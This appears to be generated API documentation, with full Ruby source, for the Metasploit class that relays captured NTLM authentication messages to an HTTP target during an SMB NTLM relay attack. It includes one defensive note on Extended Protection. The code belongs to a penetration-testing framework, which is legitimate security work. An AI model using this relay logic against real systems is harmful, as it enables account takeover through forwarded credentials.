Class: Msf::Exploit::Remote::SMB::Relay::NTLM::Target::HTTP::Client

Inherits:
Object
  • Object
Extended by:
Forwardable
Defined in:
lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb

Overview

The HTTP client used to interact with the relayed target.


Constructor Details

#initialize(provider: nil, target: nil, logger: nil, timeout: -1) ⇒ Client

Returns a new instance of Client.



# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 11

# Builds the HTTP client used to talk to the relay target.
#
# provider and target default to nil but are dereferenced below, so callers
# must supply both or construction raises NoMethodError.
#
# @param provider [Object] only provider.dispatcher.tcp_socket.context is read here
# @param target [Object] relay target; ip, port and protocol are read here
# @param logger [Object] stored in @logger and handed to the HTTP logger subscriber
# @param timeout [Integer] stored in @timeout and later passed to send_recv
def initialize(provider: nil, target: nil, logger: nil, timeout: -1)
  @timeout = timeout
  @target = target
  @provider = provider
  @logger = logger

  subscriber = Rex::Proto::Http::HttpLoggerSubscriber.new(logger: logger)
  host = target.ip
  port = target.port
  socket_context = provider.dispatcher.tcp_socket.context
  # Fourth positional argument: true only when the target protocol is :https.
  is_https = target.protocol == :https

  @client = Rex::Proto::Http::Client.new(host, port, socket_context, is_https, subscriber: subscriber)
end

Instance Attribute Details

#logger ⇒ Object (readonly, protected)

Returns the value of attribute logger.



# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 102

# Reader for the logger object stored in @logger.
#
# @return [Object] the value of @logger
def logger
  @logger
end

#target ⇒ Object (readonly)

Returns the value of attribute target.



# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 9

# Reader for the relay target stored in @target.
#
# @return [Object] the value of @target
def target
  @target
end

#timeout ⇒ Object

Returns the value of attribute timeout.



# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 8

# Reader for the timeout stored in @timeout.
#
# The relay methods pass this value as the second argument to
# @client.send_recv. The constructor default is -1.
# NOTE(review): the meaning of -1 is defined by the underlying HTTP client
# and is not visible here; confirm before relying on it.
#
# @return [Object] the value of @timeout
def timeout
  @timeout
end

Class Method Details

.create(provider, target, logger, timeout) ⇒ Object



# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 27

# Positional-argument factory that forwards to the keyword constructor.
#
# @param provider [Object] passed through as provider:
# @param target [Object] passed through as target:
# @param logger [Object] passed through as logger:
# @param timeout [Object] passed through as timeout:
# @return [Object] whatever new returns
def self.create(provider, target, logger, timeout)
  options = { provider: provider, target: target, logger: logger, timeout: timeout }
  new(**options)
end

Instance Method Details

#disconnect! ⇒ Object



# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 36

# Closes the underlying HTTP client.
#
# @return [Object] whatever @client.close returns
def disconnect!
  @client.close
end

#relay_ntlmssp_type1(client_type1_msg) ⇒ Object

Parameters:

  • client_type1_msg (String)


# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 42

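# Forwards the client's NTLMSSP type 1 message to the HTTP target and returns
# the target's challenge.
#
# The message is Base64-encoded into an "Authorization: NTLM ..." header on a
# GET for the target path. A 401 response is expected; the second
# whitespace-separated field of its WWW-Authenticate header is decoded as the
# NTLM message.
#
# The response is entirely controlled by the remote server, so a missing
# WWW-Authenticate header, or one with no token after the scheme, is logged
# and reported as a failure instead of being dereferenced.
#
# Defensive note: HTTP services that enforce Extended Protection for
# Authentication (channel/service binding) or that disable NTLM reject
# forwarded authentication of this kind.
#
# @param client_type1_msg [String] the type 1 message to forward
# @return [Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult, nil]
#   the decoded challenge with STATUS_MORE_PROCESSING_REQUIRED, or nil when no
#   response, a non-401 status, or no challenge token was received
def relay_ntlmssp_type1(client_type1_msg)
  req = @client.request_raw(
    'method'  => 'GET',
    'uri'     => @target.path,
    'headers' => {
      'Accept-Encoding' => 'identity',
      'Authorization' => 'NTLM ' + Base64.strict_encode64(client_type1_msg)
    }
  )

  res = @client.send_recv(req, @timeout, true)

  challenge = nil
  failure =
    if res.nil?
      'no HTTP response received'
    elsif res.code != 401
      "HTTP status #{res.code} received"
    else
      # to_s covers an absent header; split[1] is nil when only a scheme is present.
      challenge = res.headers['WWW-Authenticate'].to_s.split[1]
      'no NTLM challenge in WWW-Authenticate header' if challenge.nil?
    end

  if failure
    msg = "Unable to retrieve server challenge from #{target} (#{failure})"
    elog(msg)
    logger.print_error msg
    return nil
  end

  Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult.new(
    message: Net::NTLM::Message.decode64(challenge),
    nt_status: WindowsError::NTStatus::STATUS_MORE_PROCESSING_REQUIRED
  )
end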

#relay_ntlmssp_type3(client_type3_msg) ⇒ Object

Parameters:

  • client_type3_msg (String)


# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 76

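# Forwards the client's NTLMSSP type 3 message to the HTTP target and maps
# the HTTP status to an NT status.
#
# A 2xx status is reported as STATUS_SUCCESS. Every other status is reported
# as STATUS_LOGON_FAILURE, so server errors and redirects are not
# distinguished from rejected credentials.
#
# send_recv can return nil (relay_ntlmssp_type1 handles that case), so a
# missing response is logged and returned as nil here as well instead of
# raising NoMethodError on res.code.
#
# @param client_type3_msg [String] the type 3 message to forward
# @return [Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult, nil]
#   the mapped result, or nil when no HTTP response was received
def relay_ntlmssp_type3(client_type3_msg)
  req = @client.request_raw(
    'method'  => 'GET',
    'uri'     => @target.path,
    'headers' => {
      'Accept-Encoding' => 'identity',
      'Authorization' => 'NTLM ' + Base64.strict_encode64(client_type3_msg)
    }
  )
  res = @client.send_recv(req, @timeout, true)

  if res.nil?
    msg = "Unable to complete authentication with #{target} (no HTTP response received)"
    elog(msg)
    logger.print_error msg
    return nil
  end

  nt_status =
    if res.code.between?(200, 299)
      WindowsError::NTStatus::STATUS_SUCCESS
    else
      WindowsError::NTStatus::STATUS_LOGON_FAILURE
    end
  Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult.new(nt_status: nt_status)
end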

#send_recv(req, t = -1, persist = true) ⇒ Object



# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 95

# Sends a request through the underlying HTTP client and returns its response.
#
# NOTE(review): persistence presumably matters because NTLM over HTTP
# authenticates the connection, so later requests must reuse the socket that
# carried the handshake; confirm against the underlying client.
#
# @param req [Object] request object, as built by @client.request_raw elsewhere in this class
# @param t [Integer] passed through as the second argument (default -1)
# @param persist [Boolean] passed through as the third argument (default true)
# @return [Object] whatever @client.send_recv returns
def send_recv(req, t = -1, persist = true)
  # enable persistence by default to keep the connection open
  @client.send_recv(req, t, persist)
end